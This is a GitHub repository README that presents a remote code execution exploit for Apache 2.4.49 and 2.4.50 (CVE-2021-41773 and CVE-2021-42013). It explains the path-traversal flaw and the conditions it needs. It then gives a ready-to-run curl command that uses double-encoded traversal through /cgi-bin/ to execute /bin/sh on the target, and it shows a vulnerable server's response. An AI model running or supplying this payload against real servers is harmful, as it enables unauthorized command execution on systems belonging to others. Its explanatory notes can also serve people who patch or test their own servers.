Skip to content

Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50

Notifications You must be signed in to change notification settings

mr-exo/CVE-2021-41773

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 

Repository files navigation

RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):

IMHO only "special" setups will be vulnerable to this RCE.
Same happens for the "arbitrary file read" exploits you have seen.

Both CVEs are indeed almost the same path-traversal vulnerability (2nd one is the uncomplete fix for 1st one).
Path traversal only work from a mapped URI (e.g. via "Alias" or "ScriptAlias" Apache directives). DocumentRoot only is not sufficient.

"/cgi-bin/" is mapped by default (ScriptAlias) so that's why it's being used before the path traversal string.
Besides, ScriptAlias marks as Exec (for Apache) all the contents for the given directory (regardless the file extensions).

Requirements:

1/ mod_cgi enabled (not default but easy)
2/ target binary should be +x (default for /bin/sh)
3/ apache permissions granted for /bin or / (not default and difficult/unrealistic)\

Check if server is vulnerable:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Response from a vulnerable server:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

About

Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published